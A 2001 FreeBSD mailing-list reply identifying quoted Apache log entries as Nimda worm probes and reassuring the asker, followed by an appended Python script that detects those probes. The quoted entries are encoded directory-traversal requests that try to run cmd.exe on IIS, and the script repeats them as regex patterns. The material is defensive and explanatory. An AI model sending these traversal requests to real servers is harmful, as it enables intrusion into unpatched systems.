Date:      Tue, 13 Nov 2001 23:02:59 -0500
From:      Louis LeBlanc <leblanc+freebsd@keyslapper.org>
To:        freebsd-questions@FreeBSD.org, freebsd-questions@FreeBSD.org
Subject:   Re: Do these errors mean my system is compromised?
Message-ID:  <20011114040259.GC25941@keyslapper.org>
In-Reply-To: <20011114040055.GB25941@keyslapper.org>
References:  <0111131938440F.60958@chip.wiegand.org> <20011114040055.GB25941@keyslapper.org>

On 11/13/01 11:00 PM, Louis LeBlanc sat at the `puter and typed:
> On 11/13/01 07:38 PM, Chip sat at the `puter and typed:
> > I found the following on my apache/freebsd/php/mysql server in my log after
> > running analog -
> > Looks like someone planted something that wants NT to work correctly -
> >
> >  111: /scripts/..%255c../winnt/system32/cmd.exe
> >  111:   /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
> >  106: /scripts/..%5c../winnt/system32/cmd.exe
> >  106:   /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
> >   66: /scripts/root.exe
> >   66:   /scripts/root.exe?/c+dir
> >   64: /MSADC/root.exe
> >   64:   /MSADC/root.exe?/c+dir
> >   62: /c/winnt/system32/cmd.exe
> >   62:   /c/winnt/system32/cmd.exe?/c+dir
> >   59: /d/winnt/system32/cmd.exe
> >   59:   /d/winnt/system32/cmd.exe?/c+dir
> >   56: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
> >   56:   /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> >   56: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe
> >   56:   /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> >   56: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
> >   56:   /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> >   55: /scripts/..%c1%1c../winnt/system32/cmd.exe
> >   55:   /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
> >   54: /scripts/winnt/system32/cmd.exe
> >   54:   /scripts/winnt/system32/cmd.exe?/c+dir
> >   54: /scripts/..%c1%9c../winnt/system32/cmd.exe
> >   54:   /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
> >   54: /scripts/..%c0%af../winnt/system32/cmd.exe
> >   54:   /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
> >   51: /scripts/..%252f../winnt/system32/cmd.exe
> >   51:   /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
>
>
> This  is the  footprint of  the Nimda  virus *trying*  to infect  your
> system. You can find links to specific  info on what Nimda tries to do
> on Google, if you  want to sort thru a million hits.  You can also get
> info on  how an Apache  installation can  handle these (or  not handle
> them) at http://www.keyslapper.org/modules/
>
> Look for the  Apache::Nimda page, even if you don't  want to report it
> to abuse and SecurityFocus, there are  config ideas that will help you
> reduce the impact on your log file size.
>
> Also, look for the Apache::404 module. It will handle those misses and
> notify you via email  - once per period for each URL.  It can help you
> keep track of Nimda's impact on  your server, and keep dead links tied
> up.
>
> Enough of the shameless plug.  Check it out.
>

Sorry, I  forgot to answer your  actual question. No, you've  not been
compromised. At  least this is no  indication. Nimda is strictly  a MS
gift to the world.

Lou
-- 
Louis LeBlanc               leblanc@keyslapper.org
Fully Funded Hobbyist, KeySlapper Extrordinaire :)
http://www.keyslapper.org

aphorism, n.:
  A concise, clever statement.
afterism, n.:
  A concise, clever statement you don't think of until too late.
    -- James Alexander Thom
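As an added illustration that is not part of the thread: a small log-triage script that picks the IIS probe URLs listed above out of Apache access-log lines, counts them per URL the way analog did, and flags any probe that was not answered with a 404. It assumes the Apache common log format; the sample lines are constructed (test addresses) from the URLs quoted in the thread.

```python
import re
from collections import Counter

# Apache common/combined log format (assumed): client ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: [^"]+)?" (?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures lifted from the probe list in the thread: IIS cmd.exe/root.exe
# requests plus the double-encoded and overlong-UTF-8 "..\" traversals.
PROBE_RE = re.compile(
    r'(/winnt/system32/cmd\.exe|/root\.exe|\.\.%255c|\.\.%5c|\.\.%252f'
    r'|\.\.%c0%af|\.\.%c1%1c|\.\.%c1%9c)',
    re.IGNORECASE,
)

def parse_line(line):
    """Return the log fields as a dict, or None if the line does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_nimda_probe(path):
    return PROBE_RE.search(path) is not None

def summarize(lines):
    """Return (hits_per_path, suspicious). hits_per_path mirrors analog's per-URL
    counts; suspicious holds probes that did NOT get a 404, which on an
    Apache/FreeBSD box (where those paths should not exist) deserve a look."""
    hits = Counter()
    suspicious = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_nimda_probe(rec["path"]):
            continue
        hits[rec["path"]] += 1
        if rec["status"] != "404":
            suspicious.append((rec["client"], rec["path"], rec["status"]))
    return hits, suspicious

# Constructed sample log lines (test addresses) using URLs from the thread.
SAMPLE_LOG = """\
192.0.2.10 - - [13/Nov/2001:19:01:02 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
192.0.2.10 - - [13/Nov/2001:19:01:03 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287
192.0.2.11 - - [13/Nov/2001:19:05:44 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285
192.0.2.11 - - [13/Nov/2001:19:05:45 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
192.0.2.12 - - [13/Nov/2001:19:09:00 -0500] "GET /index.html HTTP/1.0" 200 1043
192.0.2.10 - - [13/Nov/2001:19:12:10 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287
"""
```

Feed `summarize(open("/var/log/httpd-access.log").readlines())` the real log to get the same per-URL counts analog showed; an empty `suspicious` list is the "no, you're not compromised" answer from the thread in machine-checkable form.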

